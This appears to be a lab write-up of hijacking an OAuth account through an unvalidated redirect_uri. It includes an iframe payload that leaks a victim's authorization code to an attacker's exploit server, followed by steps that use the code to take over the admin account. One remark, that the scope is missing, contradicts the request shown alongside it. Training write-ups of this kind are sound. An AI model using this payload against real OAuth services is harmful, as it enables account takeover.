# LAB#03 OAuth account hijacking via redirect_uri

## **Lab Overview**

This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it possible for an attacker to steal authorization codes associated with other users' accounts.

To solve the lab, steal an authorization code associated with the admin user, then use it to access their account and delete the user `carlos`.

The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service.

**Credentials:**  
Username: wiener  
Password: peter

## **Exploitation**

### #1 **Logging In**

By clicking My account it will redirect to social media login.

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/ec3d8a9a-300c-44a8-a31d-4ef5d9021359.png align="center")

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/a0444c5a-3233-426e-bd08-280ca1af97ab.png align="center")

When redirection happens, it is sending a `GET` request to `/auth`.

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/6dbdb69a-369d-475e-b87d-59403b20ad8f.png align="center")

`client_id: d29pyj8d1qb33zo061roj redirect_uri: https://0a7000d10463074782fc799300210026.web-security-academy.net/oauth-callback response_type: code scope: openid%20profile%20email`

Here we can see that the `scope` is missing. `scope` specifies the permissions being requested (e.g., `openid profile email`).

Now login with credentials.

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/3b5c2a76-9ec9-45c8-ba7f-7a384b4f35e3.png align="center")

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/4d6d2fa5-da47-470d-a974-428c81fd522a.png align="center")

OAuth `callback` request containing the authorization code. lets modify the `redirect_uri` to our exploit server and capture the victim's `code` parameter.

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/f9470136-4ac7-44bf-b602-1f17efefe05c.png align="center")

Here we can see it is redirecting to evil.net and the code is reusable.

### **#2 Crafting the Payload**

Crafting the CSRF payload to get the `code` from the victim.

```html
<html>
    <head>
        <title>PAYLOAD</title>
    </head>
    <body>
        <iframe src="https://oauth-0a5900bd036f8961807c010902b60022.oauth-server.net/auth?client_id=v7j8CfcXOUHq9knuM7spVQtEL7gRqBej8-Iag9rV2mh&redirect_uri=https://exploit-0acb000d033689718055022f01cb0047.exploit-server.net/exploit/log&response_type=code&scope=openid%20profile%20email"></iframe>
    </body>
</html>
```

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/23ffd7e4-261d-42a0-8d8b-412955e4f4a3.png align="center")

Store the exploit and deliver the exploit to the victim, then go back to the access log and copy the victim's `code` from the resulting request.

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/5cdd04a0-5079-49b0-8893-551702cb18c1.png align="center")

### #3 Admin Access

After logging out, open the following URL with the stolen OAuth code

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/3f44e718-f701-45b4-96bc-b910fb5ddcf9.png align="center")

We got Admin panel access.

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/8b3c2c2c-1355-4b11-a76b-2aa61f6d4c71.png align="center")

Open the admin panel and delete `carlos` to solve the lab.

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/aecdc6e4-0efa-411e-94c2-b6810c7615e5.png align="center")

Deleted carlos!

![](https://cdn.hashnode.com/uploads/covers/69eb0c2b1e45c4e0da9bea4a/41d90249-3c1e-4b6f-afe9-7abafe9e31e4.png align="center")

## **\# And That’s a Wrap**

OAuth authorization codes must be protected, as exposing them can result in account takeover.
